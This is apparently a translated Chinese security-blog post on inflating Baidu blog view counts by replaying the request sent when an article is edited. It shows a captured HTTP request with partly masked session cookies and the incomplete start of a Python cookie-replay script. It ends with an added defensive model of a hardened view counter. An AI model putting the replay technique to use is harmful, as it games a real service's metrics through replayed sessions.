By:BlAck.Eagle
I noticed a while ago that this spot has a problem: it can be used to inflate page views maliciously.
Publish an article on Baidu, then click Edit and capture the request. It looks like this:
POST /test/commit HTTP/1.1
Host: hi.baidu.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-CN; rv:1.9) Gecko/2008052906 Firefox/3.0 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer:
Cookie: BAIDUID=D5CDD45C1EC5xxxx24F14C3141:FG=1; BDSP=e3f72afcca12495435fb37xxx00a4b0df5bd5195ccc533fa828ba61ea8d3fd1f4134970a304e251f95cad1c8a786c9177f3e6709c93d70cf3bc79f3df8dcd100baaxxx3cec3fdfc0396454b68; BDSTAT=8c856ca29021ecxxx9bb4dd5cbd02e83b01213fac0e7bec55e753ea; Hm_lpvt_4d16ad3b9xxxf64c3a01c5d=1302800577698; Hm_lvt_4d16ad3b9adade3b562e5f64c3a01c5d=1302800577698; _time_stamp_=3; BD_UTK_DVT=1; BDUSS=NHNXN-VW0yckJrUDdDVGdwa0xxxYzVOQVFBQUFBJCQAAAAAAAAAAAoakSfHV8gE08fT9LXEutrTpQAAAAAAAAAAAAAAAAAAAAAAAAAAAADgusV6AAAAAOC6xXoAAAAAcF1CAAAAAAAxMC4yxx3QKKdNeE; USERIDFO=0ebdddcae77ed638bxxx89608821cxxxb9debfe4b18
Content-Type: application/x-www-form-urlencoded
Content-Length: 322

bdstoken=ac52121470a40exxd731a94685&ct=1&mms_flag=0&cm=2&spBlogID=0c695xxxxBlogCatName_o=%C4%AC%C8%CF%B7%D6%Cxxitle=fuxxxCp%3Efuzz+for+test%xxxE&spBlogCatName=%spBlogPower=0&spIsCmtAllow=1&spShareNotAllow=0&spVcode=&spVerifyKey=
I wrote a Python script to test it. This is for security research only; I take no responsibility for the consequences. I only just started learning Python, so it is not very tidy.
# -*- coding: gb2312 -*-
import urllib2, httplib, sys, re, time

# Print every request and response httplib sends, for debugging
httplib.HTTPConnection.debuglevel = 1


def usage():
    print "########################################################"
    print "Usage:\n Fuzz 1000次 By:BlAck.Eagle"
    print "python fuzzbaidu.py 10000"
    print "baidu fuzz浏览人数"
    print "########################################################"
    print ""


class SimpleCookieHandler(urllib2.BaseHandler):
    # Attaches the logged-in session cookie to every outgoing request
    def http_request(self, req):
        # Publish any article, choose Edit, capture the request, and paste the Cookie header value here
        simple_cookie = '你的cookie'
        if not req.has_header('Cookie'):
            req.add_unredirected_header('Cookie', simple_cookie)
        else:
            cookie = req.get_header('Cookie')
            req.add_unredirected_header('Cookie', simple_cookie + '; ' + cookie)
        return req


argvs = sys.argv
The principle is simple: for registered users, Baidu increments the view count by default whenever the article is edited, so every saved edit is counted as a read.
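To make the counting flaw concrete, here is an added example (not the original post's code) modelling a view counter: the naive rule counts every render, including the author's own /test/commit round-trips, while the hardened rule ignores the edit flow, ignores the author, and counts one viewer at most once per time window. The post ids, user ids and request log are constructed.

```python
# Added example, not the original post's code: a minimal view-counter model.
# Post ids, user ids and the request log below are constructed.
from collections import defaultdict

WINDOW = 600  # seconds within which one viewer counts once per post


def naive_count(events):
    """Flawed rule the page describes: every render of the post page is a
    view, including the author's own edit/commit round-trips, so repeating
    the commit request inflates the count without limit."""
    views = defaultdict(int)
    for post_id, _viewer, _path, _ts in events:
        views[post_id] += 1
    return dict(views)


def hardened_count(events, post_authors):
    """Hardened rule: (1) requests via the edit/commit flow never count;
    (2) the post's own author never counts as a reader; (3) one viewer
    counts at most once per post per WINDOW seconds."""
    views = defaultdict(int)
    last_seen = {}  # (post_id, viewer) -> timestamp of last counted view
    for post_id, viewer, path, ts in events:
        if path.endswith("/commit"):  # an edit being saved, not a read
            continue
        if viewer == post_authors.get(post_id):
            continue
        key = (post_id, viewer)
        if ts - last_seen.get(key, float("-inf")) < WINDOW:
            continue
        last_seen[key] = ts
        views[post_id] += 1
    return dict(views)


# Constructed request log: (post_id, viewer, request path, unix timestamp).
POST_AUTHORS = {"p1": "author"}
EVENTS = [
    ("p1", "author", "/test/commit", 1000.0),  # author saves an edit
    ("p1", "author", "/test/commit", 1001.0),  # saves again
    ("p1", "author", "/test/commit", 1002.0),
    ("p1", "reader1", "/p1/view", 1005.0),     # genuine reader
    ("p1", "reader1", "/p1/view", 1010.0),     # same reader refreshes
    ("p1", "reader2", "/p1/view", 1700.0),     # second reader
    ("p1", "reader1", "/p1/view", 1700.0),     # reader1, window expired
]
```

On this log the naive rule reports 7 views for p1 and the hardened rule reports 3; the three scripted commits and the quick refresh are dropped.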
Article source: lcx.cc: Testing malicious view-count inflation through Baidu article edits (gaming Baidu article view counts)